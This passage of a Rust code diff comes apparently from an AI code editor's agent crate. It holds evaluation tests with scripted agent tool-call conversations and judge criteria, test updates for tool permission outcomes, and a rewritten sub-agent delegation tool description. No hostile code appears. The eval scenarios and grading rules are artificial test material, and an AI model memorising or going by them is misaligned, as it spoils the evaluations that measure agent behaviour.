case_sensitive: false, + }, + )], + ), + message( + User, + [tool_result("tool_2", GrepTool::NAME, "No matches found")], + ), + message( + Assistant, + [tool_use( + "tool_3", + GrepTool::NAME, + GrepToolInput { + regex: "mod\\s+tests".into(), + include_pattern: Some("font-kit/src/**/*.rs".into()), + offset: 0, + case_sensitive: false, + }, + )], + ), + message( + User, + [tool_result("tool_3", GrepTool::NAME, "No matches found")], + ), + message( + Assistant, + [tool_use( + "tool_4", + GrepTool::NAME, + GrepToolInput { + regex: "#\\[test\\]".into(), + include_pattern: Some("font-kit/src/**/*.rs".into()), + offset: 0, + case_sensitive: false, + }, + )], + ), + message( + User, + [tool_result( + "tool_4", + GrepTool::NAME, + indoc::indoc! 
{" + Found 6 matches: + + ## Matches in font-kit/src/loaders/core_text.rs + + ### mod test › L926-936 + ``` + mod test { + use super::Font; + use crate::properties::{Stretch, Weight}; + + #[cfg(feature = \"source\")] + use crate::source::SystemSource; + + static TEST_FONT_POSTSCRIPT_NAME: &'static str = \"ArialMT\"; + + #[cfg(feature = \"source\")] + #[test] + ``` + + 55 lines remaining in ancestor node. Read the file to see all. + + ### mod test › L947-951 + ``` + } + + #[test] + fn test_core_text_to_css_font_weight() { + // Exact matches + ``` + + ### mod test › L959-963 + ``` + } + + #[test] + fn test_core_text_to_css_font_stretch() { + // Exact matches + ``` + + ## Matches in font-kit/src/loaders/freetype.rs + + ### mod test › L1238-1248 + ``` + mod test { + use crate::loaders::freetype::Font; + + static PCF_FONT_PATH: &str = \"resources/tests/times-roman-pcf/timR12.pcf\"; + static PCF_FONT_POSTSCRIPT_NAME: &str = \"Times-Roman\"; + + #[test] + fn get_pcf_postscript_name() { + let font = Font::from_path(PCF_FONT_PATH, 0).unwrap(); + assert_eq!(font.postscript_name().unwrap(), PCF_FONT_POSTSCRIPT_NAME); + } + ``` + + 1 lines remaining in ancestor node. Read the file to see all. + + ## Matches in font-kit/src/sources/core_text.rs + + ### mod test › L265-275 + ``` + mod test { + use crate::properties::{Stretch, Weight}; + + #[test] + fn test_css_to_core_text_font_weight() { + // Exact matches + assert_eq!(super::css_to_core_text_font_weight(Weight(100.0)), -0.7); + assert_eq!(super::css_to_core_text_font_weight(Weight(400.0)), 0.0); + assert_eq!(super::css_to_core_text_font_weight(Weight(700.0)), 0.4); + assert_eq!(super::css_to_core_text_font_weight(Weight(900.0)), 0.8); + + ``` + + 27 lines remaining in ancestor node. Read the file to see all. 
+ + ### mod test › L278-282 + ``` + } + + #[test] + fn test_css_to_core_text_font_stretch() { + // Exact matches + ``` + "}, + )], + ), + ], + input_file_path, + Some(input_file_content.into()), + EvalAssertion::judge_diff(indoc::indoc! {" + - The diff contains a new `from_pixels` constructor + - The diff contains new tests for the `from_pixels` constructor + "}), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_zode() { + let input_file_path = "root/zode.py"; + let input_content = None; + + eval_utils::eval(50, 1., eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![ + message(User, [text(include_str!("fixtures/zode/prompt.md"))]), + message( + Assistant, + [ + tool_use( + "tool_1", + ReadFileTool::NAME, + ReadFileToolInput { + path: "root/eval/react.py".into(), + start_line: None, + end_line: None, + }, + ), + tool_use( + "tool_2", + ReadFileTool::NAME, + ReadFileToolInput { + path: "root/eval/react_test.py".into(), + start_line: None, + end_line: None, + }, + ), + ], + ), + message( + User, + [ + tool_result( + "tool_1", + ReadFileTool::NAME, + include_str!("fixtures/zode/react.py"), + ), + tool_result( + "tool_2", + ReadFileTool::NAME, + include_str!("fixtures/zode/react_test.py"), + ), + ], + ), + ], + input_file_path, + input_content.clone(), + EvalAssertion::new(async move |sample, _, _cx| { + let invalid_starts = [' ', '`', '\n']; + let mut message = String::new(); + for start in invalid_starts { + if sample.text_after.starts_with(start) { + message.push_str(&format!("The sample starts with a {:?}\n", start)); + break; + } + } + message.pop(); + + if message.is_empty() { + Ok(EvalAssertionOutcome { + score: 100, + message: None, + }) + } else { + Ok(EvalAssertionOutcome { + score: 0, + message: Some(message), + }) + } + }), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_add_overwrite_test() { + let input_file_path = "root/action_log.rs"; + let input_file_content = 
include_str!("fixtures/add_overwrite_test/before.rs"); + + eval_utils::eval(200, 0.5, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![ + message( + User, + [text(indoc::indoc! {" + Introduce a new test in `action_log.rs` to test overwriting a file. + That is, a file already exists, but we call `buffer_created` as if the file were new. + Take inspiration from all the other tests in the file. + "})], + ), + message( + Assistant, + [tool_use( + "tool_1", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: None, + end_line: None, + }, + )], + ), + message( + User, + [tool_result( + "tool_1", + ReadFileTool::NAME, + indoc::indoc! {" + pub struct ActionLog [L13-20] + tracked_buffers [L15] + edited_since_project_diagnostics_check [L17] + project [L19] + impl ActionLog [L22-498] + pub fn new [L24-30] + pub fn project [L32-34] + pub fn checked_project_diagnostics [L37-39] + pub fn has_edited_files_since_project_diagnostics_check [L42-44] + fn track_buffer_internal [L46-101] + fn handle_buffer_event [L103-116] + fn handle_buffer_edited [L118-123] + fn handle_buffer_file_changed [L125-158] + async fn maintain_diff [L160-264] + pub fn buffer_read [L267-269] + pub fn buffer_created [L272-276] + pub fn buffer_edited [L279-287] + pub fn will_delete_buffer [L289-304] + pub fn keep_edits_in_range [L306-364] + pub fn reject_edits_in_ranges [L366-459] + pub fn keep_all_edits [L461-473] + pub fn changed_buffers [L476-482] + pub fn stale_buffers [L485-497] + fn apply_non_conflicting_edits [L500-561] + fn diff_snapshots [L563-585] + fn point_to_row_edit [L587-614] + enum ChangeAuthor [L617-620] + User [L618] + Agent [L619] + enum TrackedBufferStatus [L623-627] + Created [L624] + Modified [L625] + Deleted [L626] + struct TrackedBuffer [L629-641] + buffer [L630] + base_text [L631] + unreviewed_changes [L632] + status [L633] + version [L634] + diff [L635] + snapshot [L636] + diff_update [L637] + _open_lsp_handle [L638] + 
_maintain_diff [L639] + _subscription [L640] + impl TrackedBuffer [L643-657] + fn has_changes [L644-650] + fn schedule_diff_update [L652-656] + pub struct ChangedBuffer [L659-661] + pub diff [L660] + mod tests [L664-1574] + fn init_logger [L678-682] + fn init_test [L684-691] + async fn test_keep_edits [L694-769] + async fn test_deletions [L772-854] + async fn test_overlapping_user_edits [L857-951] + async fn test_creating_files [L954-1010] + async fn test_deleting_files [L1013-1120] + async fn test_reject_edits [L1123-1255] + async fn test_reject_multiple_edits [L1258-1331] + async fn test_reject_deleted_file [L1334-1388] + async fn test_reject_created_file [L1391-1443] + async fn test_random_diffs [L1446-1535] + fn quiesce [L1510-1534] + struct HunkStatus [L1538-1542] + range [L1539] + diff_status [L1540] + old_text [L1541] + fn unreviewed_hunks [L1544-1573] + + Showing symbols 1-69 (total symbols: 69) + + Using the line numbers in this outline, you can call this tool again while specifying + the start_line and end_line fields to see the implementations of symbols in the outline. 
+ "}, + )], + ), + message( + Assistant, + [ + text( + "Let's look at the existing test cases that are related to file creation to understand the pattern:", + ), + tool_use( + "tool_2", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: Some(953), + end_line: Some(1010), + }, + ), + ], + ), + message( + User, + [tool_result( + "tool_2", + ReadFileTool::NAME, + lines(input_file_content, 953..1010), + )], + ), + message( + Assistant, + [ + text( + "Now let's look at another relevant test to understand how they're structured:", + ), + tool_use( + "tool_3", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: Some(1012), + end_line: Some(1120), + }, + ), + ], + ), + message( + User, + [tool_result( + "tool_3", + ReadFileTool::NAME, + lines(input_file_content, 1012..1120), + )], + ), + message( + Assistant, + [ + text("Now let's look at how `buffer_created` is implemented:"), + tool_use( + "tool_4", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: Some(271), + end_line: Some(276), + }, + ), + ], + ), + message( + User, + [tool_result( + "tool_4", + ReadFileTool::NAME, + lines(input_file_content, 271..276), + )], + ), + ], + input_file_path, + Some(input_file_content.into()), + EvalAssertion::judge_diff( + "A new test for overwritten files was created, without changing any previous test", + ), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_create_empty_file() { + let input_file_path = "root/TODO3"; + let input_file_content = None; + let expected_output_content = String::new(); + + eval_utils::eval(100, 0.99, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![ + message(User, [text("Create a second empty todo file ")]), + message( + Assistant, + [ + text(indoc::formatdoc! {" + I'll help you create a second empty todo file. 
+ First, let me examine the project structure to see if there's already a todo file, which will help me determine the appropriate name and location for the second one. + "}), + tool_use( + "toolu_01GAF8TtsgpjKxCr8fgQLDgR", + ListDirectoryTool::NAME, + ListDirectoryToolInput { + path: "root".to_string(), + }, + ), + ], + ), + message( + User, + [tool_result( + "toolu_01GAF8TtsgpjKxCr8fgQLDgR", + ListDirectoryTool::NAME, + "root/TODO\nroot/TODO2\nroot/new.txt\n", + )], + ), + ], + input_file_path, + input_file_content.clone(), + EvalAssertion::assert_eq(expected_output_content.clone()), + )) + }); +} diff --git a/crates/agent/src/tools/list_directory_tool.rs b/crates/agent/src/tools/list_directory_tool.rs index 1a674aaa71fef5bf9c11688e82982a5dbcfee331..c88492bba40ee4fdfa928f153e49a302ad60be8b 100644 --- a/crates/agent/src/tools/list_directory_tool.rs +++ b/crates/agent/src/tools/list_directory_tool.rs @@ -848,7 +848,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -979,13 +982,11 @@ mod tests { "Expected private path validation error, got: {error}" ); - let event = event_rx.try_next(); + let event = event_rx.try_recv(); assert!( !matches!( event, - Ok(Some(Ok(crate::thread::ThreadEvent::ToolCallAuthorization( - _ - )))) + Ok(Ok(crate::thread::ThreadEvent::ToolCallAuthorization(_))) ), "No authorization should be requested when validation fails before listing", ); @@ -1027,13 +1028,11 @@ mod tests { "Normal path should succeed without authorization" ); - let event = event_rx.try_next(); + let event = event_rx.try_recv(); assert!( !matches!( event, - Ok(Some(Ok(crate::thread::ThreadEvent::ToolCallAuthorization( - _ - )))) + Ok(Ok(crate::thread::ThreadEvent::ToolCallAuthorization(_))) ), "No authorization should be requested for normal paths", ); @@ -1084,13 
+1083,11 @@ mod tests { "Intra-project symlink should succeed without authorization: {result:?}", ); - let event = event_rx.try_next(); + let event = event_rx.try_recv(); assert!( !matches!( event, - Ok(Some(Ok(crate::thread::ThreadEvent::ToolCallAuthorization( - _ - )))) + Ok(Ok(crate::thread::ThreadEvent::ToolCallAuthorization(_))) ), "No authorization should be requested for intra-project symlinks", ); diff --git a/crates/agent/src/tools/move_path_tool.rs b/crates/agent/src/tools/move_path_tool.rs index c246b3c5b0661546f4617bb5521766f9da3839fb..eaea204d84d96ab841f2e075a42a1a42b827374d 100644 --- a/crates/agent/src/tools/move_path_tool.rs +++ b/crates/agent/src/tools/move_path_tool.rs @@ -273,7 +273,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -379,13 +382,16 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Expected a single authorization prompt", ); @@ -451,8 +457,8 @@ mod tests { assert!(result.is_err(), "Tool should fail when policy denies"); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Deny policy should not emit symlink authorization prompt", ); diff --git a/crates/agent/src/tools/read_file_tool.rs b/crates/agent/src/tools/read_file_tool.rs index bbc67cf68c7d104772c18ad222478621ce4d7a54..0086a82f4e79c9924502202873ceb2b25d2e66fb 100644 --- 
a/crates/agent/src/tools/read_file_tool.rs +++ b/crates/agent/src/tools/read_file_tool.rs @@ -2,7 +2,7 @@ use action_log::ActionLog; use agent_client_protocol::{self as acp, ToolCallUpdateFields}; use anyhow::{Context as _, Result, anyhow}; use futures::FutureExt as _; -use gpui::{App, Entity, SharedString, Task, WeakEntity}; +use gpui::{App, Entity, SharedString, Task}; use indoc::formatdoc; use language::Point; use language_model::{LanguageModelImage, LanguageModelToolResultContent}; @@ -21,7 +21,7 @@ use super::tool_permissions::{ ResolvedProjectPath, authorize_symlink_access, canonicalize_worktree_roots, resolve_project_path, }; -use crate::{AgentTool, Thread, ToolCallEventStream, ToolInput, outline}; +use crate::{AgentTool, ToolCallEventStream, ToolInput, outline}; /// Reads the content of the given file in the project. /// @@ -56,21 +56,21 @@ pub struct ReadFileToolInput { } pub struct ReadFileTool { - thread: WeakEntity, project: Entity, action_log: Entity, + update_agent_location: bool, } impl ReadFileTool { pub fn new( - thread: WeakEntity, project: Entity, action_log: Entity, + update_agent_location: bool, ) -> Self { Self { - thread, project, action_log, + update_agent_location, } } } @@ -119,7 +119,6 @@ impl AgentTool for ReadFileTool { cx: &mut App, ) -> Task> { let project = self.project.clone(); - let thread = self.thread.clone(); let action_log = self.action_log.clone(); cx.spawn(async move |cx| { let input = input @@ -212,7 +211,6 @@ impl AgentTool for ReadFileTool { }); if is_image { - let image_entity: Entity = cx .update(|cx| { self.project.update(cx, |project, cx| { @@ -258,17 +256,6 @@ impl AgentTool for ReadFileTool { return Err(tool_content_err(format!("{file_path} not found"))); } - // Record the file read time and mtime - if let Some(mtime) = buffer.read_with(cx, |buffer, _| { - buffer.file().and_then(|file| file.disk_state().mtime()) - }) { - thread - .update(cx, |thread, _| { - thread.file_read_times.insert(abs_path.to_path_buf(), 
mtime); - }) - .ok(); - } - let mut anchor = None; // Check if specific line ranges are provided @@ -328,15 +315,17 @@ impl AgentTool for ReadFileTool { }; project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: anchor.unwrap_or_else(|| { - text::Anchor::min_for_buffer(buffer.read(cx).remote_id()) + if self.update_agent_location { + project.set_agent_location( + Some(AgentLocation { + buffer: buffer.downgrade(), + position: anchor.unwrap_or_else(|| { + text::Anchor::min_for_buffer(buffer.read(cx).remote_id()) + }), }), - }), - cx, - ); + cx, + ); + } if let Ok(LanguageModelToolResultContent::Text(text)) = &result { let text: &str = text; let markdown = MarkdownCodeBlock { @@ -358,13 +347,10 @@ impl AgentTool for ReadFileTool { #[cfg(test)] mod test { use super::*; - use crate::{ContextServerRegistry, Templates, Thread}; use agent_client_protocol as acp; use fs::Fs as _; use gpui::{AppContext, TestAppContext, UpdateGlobal as _}; - use language_model::fake_provider::FakeLanguageModel; use project::{FakeFs, Project}; - use prompt_store::ProjectContext; use serde_json::json; use settings::SettingsStore; use std::path::PathBuf; @@ -379,20 +365,7 @@ mod test { fs.insert_tree(path!("/root"), json!({})).await; let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new(thread.downgrade(), project, action_log)); + let tool = Arc::new(ReadFileTool::new(project, action_log, true)); let (event_stream, _) = ToolCallEventStream::test(); 
let result = cx @@ -425,20 +398,7 @@ mod test { .await; let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new(thread.downgrade(), project, action_log)); + let tool = Arc::new(ReadFileTool::new(project, action_log, true)); let result = cx .update(|cx| { let input = ReadFileToolInput { @@ -472,20 +432,7 @@ mod test { let language_registry = project.read_with(cx, |project, _| project.languages().clone()); language_registry.add(language::rust_lang()); let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new(thread.downgrade(), project, action_log)); + let tool = Arc::new(ReadFileTool::new(project, action_log, true)); let result = cx .update(|cx| { let input = ReadFileToolInput { @@ -565,20 +512,7 @@ mod test { let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| 
ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new(thread.downgrade(), project, action_log)); + let tool = Arc::new(ReadFileTool::new(project, action_log, true)); let result = cx .update(|cx| { let input = ReadFileToolInput { @@ -610,20 +544,7 @@ mod test { .await; let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new(thread.downgrade(), project, action_log)); + let tool = Arc::new(ReadFileTool::new(project, action_log, true)); // start_line of 0 should be treated as 1 let result = cx @@ -753,20 +674,7 @@ mod test { let project = Project::test(fs.clone(), [path!("/project_root").as_ref()], cx).await; let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new(thread.downgrade(), project, action_log)); + let tool = Arc::new(ReadFileTool::new(project, action_log, true)); // Reading a file outside the project worktree should fail let result = cx @@ -961,20 +869,7 @@ mod test { let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; let action_log = cx.new(|_| 
ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new(thread.downgrade(), project, action_log)); + let tool = Arc::new(ReadFileTool::new(project, action_log, true)); let (event_stream, mut event_rx) = ToolCallEventStream::test(); let read_task = cx.update(|cx| { @@ -1001,7 +896,10 @@ mod test { ); authorization .response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = read_task.await; @@ -1080,24 +978,7 @@ mod test { .await; let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new( - thread.downgrade(), - project.clone(), - action_log.clone(), - )); + let tool = Arc::new(ReadFileTool::new(project.clone(), action_log.clone(), true)); // Test reading allowed files in worktree1 let result = cx @@ -1284,24 +1165,7 @@ mod test { cx.executor().run_until_parked(); let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - 
project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new( - thread.downgrade(), - project.clone(), - action_log, - )); + let tool = Arc::new(ReadFileTool::new(project.clone(), action_log, true)); let (event_stream, mut event_rx) = ToolCallEventStream::test(); let task = cx.update(|cx| { @@ -1324,7 +1188,10 @@ mod test { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -1360,24 +1227,7 @@ mod test { cx.executor().run_until_parked(); let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new( - thread.downgrade(), - project.clone(), - action_log, - )); + let tool = Arc::new(ReadFileTool::new(project.clone(), action_log, true)); let (event_stream, mut event_rx) = ToolCallEventStream::test(); let task = cx.update(|cx| { @@ -1440,24 +1290,7 @@ mod test { cx.executor().run_until_parked(); let action_log = cx.new(|_| ActionLog::new(project.clone())); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let tool = Arc::new(ReadFileTool::new( - thread.downgrade(), - 
project.clone(), - action_log, - )); + let tool = Arc::new(ReadFileTool::new(project.clone(), action_log, true)); let (event_stream, mut event_rx) = ToolCallEventStream::test(); let result = cx @@ -1484,13 +1317,11 @@ mod test { "Expected private-files validation error, got: {error}" ); - let event = event_rx.try_next(); + let event = event_rx.try_recv(); assert!( !matches!( event, - Ok(Some(Ok(crate::thread::ThreadEvent::ToolCallAuthorization( - _ - )))) + Ok(Ok(crate::thread::ThreadEvent::ToolCallAuthorization(_))) ), "No authorization should be requested when validation fails before read", ); diff --git a/crates/agent/src/tools/restore_file_from_disk_tool.rs b/crates/agent/src/tools/restore_file_from_disk_tool.rs index c1aa8690a840ea6911dcb94c26c8cef3cb5f313d..b808a966cf983c92a5e93c19599ff5333ed70860 100644 --- a/crates/agent/src/tools/restore_file_from_disk_tool.rs +++ b/crates/agent/src/tools/restore_file_from_disk_tool.rs @@ -523,7 +523,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let _result = task.await; @@ -586,8 +589,8 @@ mod tests { assert!(result.is_err(), "Tool should fail when policy denies"); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Deny policy should not emit symlink authorization prompt", ); @@ -651,13 +654,16 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), 
"Expected a single authorization prompt", ); diff --git a/crates/agent/src/tools/save_file_tool.rs b/crates/agent/src/tools/save_file_tool.rs index 99e937b9dff2a1b4781dde16bd2bf6d64edd25ad..0cf9666a415f8174e9036ebadf8368589294c885 100644 --- a/crates/agent/src/tools/save_file_tool.rs +++ b/crates/agent/src/tools/save_file_tool.rs @@ -518,7 +518,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let _result = task.await; @@ -581,8 +584,8 @@ mod tests { assert!(result.is_err(), "Tool should fail when policy denies"); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Deny policy should not emit symlink authorization prompt", ); @@ -646,13 +649,16 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Expected a single authorization prompt", ); @@ -727,7 +733,10 @@ mod tests { let auth = event_rx.expect_authorization().await; auth.response - .send(acp::PermissionOptionId::new("deny")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("deny"), + acp::PermissionOptionKind::RejectOnce, + )) .unwrap(); let output = task.await.unwrap(); diff --git a/crates/agent/src/tools/spawn_agent_tool.rs b/crates/agent/src/tools/spawn_agent_tool.rs index f46e85ce26d9194047ef62223393db0ac30f0f4b..27afbbdc3ea05ddbfea689d1bb1a18c53b42198b 100644 --- a/crates/agent/src/tools/spawn_agent_tool.rs 
+++ b/crates/agent/src/tools/spawn_agent_tool.rs @@ -1,4 +1,4 @@ -use acp_thread::SUBAGENT_SESSION_ID_META_KEY; +use acp_thread::{SUBAGENT_SESSION_INFO_META_KEY, SubagentSessionInfo}; use agent_client_protocol as acp; use anyhow::Result; use gpui::{App, SharedString, Task}; @@ -10,20 +10,32 @@ use std::sync::Arc; use crate::{AgentTool, ThreadEnvironment, ToolCallEventStream, ToolInput}; -/// Spawns an agent to perform a delegated task. +/// Spawn a sub-agent for a well-scoped task. /// -/// Use this tool when you want to: -/// - Run multiple tasks in parallel. -/// - Delegate a self-contained task where you only need the final outcome. +/// ### Designing delegated subtasks +/// - An agent does not see your conversation history. Include all relevant context (file paths, requirements, constraints) in the message. +/// - Subtasks must be concrete, well-defined, and self-contained. +/// - Delegated subtasks must materially advance the main task. +/// - Do not duplicate work between your work and delegated subtasks. +/// - Do not use this tool for tasks you could accomplish directly with one or two tool calls. +/// - When you delegate work, focus on coordinating and synthesizing results instead of duplicating the same work yourself. +/// - Avoid issuing multiple delegate calls for the same unresolved subproblem unless the new delegated task is genuinely different and necessary. +/// - Narrow the delegated ask to the concrete output you need next. +/// - For code-edit subtasks, decompose work so each delegated task has a disjoint write set. +/// - When sending a follow-up using an existing agent session_id, the agent already has the context from the previous turn. Send only a short, direct message. Do NOT repeat the original task or context. /// -/// You will receive only the agent's final message as output. 
+/// ### Parallel delegation patterns +/// - Run multiple independent information-seeking subtasks in parallel when you have distinct questions that can be answered independently. +/// - Split implementation into disjoint codebase slices and spawn multiple agents for them in parallel when the write scopes do not overlap. +/// - When a plan has multiple independent steps, prefer delegating those steps in parallel rather than serializing them unnecessarily. +/// - Reuse the returned session_id when you want to follow up on the same delegated subproblem instead of creating a duplicate session. /// -/// **New session** (no session_id): Creates a new agent that does NOT see your conversation history. Include all relevant context (file paths, requirements, constraints) in the message. -/// -/// **Follow-up** (with session_id): Sends a follow-up to an existing agent session. The agent already has full context, so send only a short, direct message — do NOT repeat the original task or context. Examples: "Also update the tests", "Fix the compile error in foo.rs", "Retry". -/// -/// - If spawning multiple agents that might write to the filesystem, provide guidance on how to avoid conflicts (e.g. assign each to different directories). +/// ### Output +/// - You will receive only the agent's final message as output. +/// - Successful calls return a session_id that you can use for follow-up messages. +/// - Error results may also include a session_id if a session was already created. 
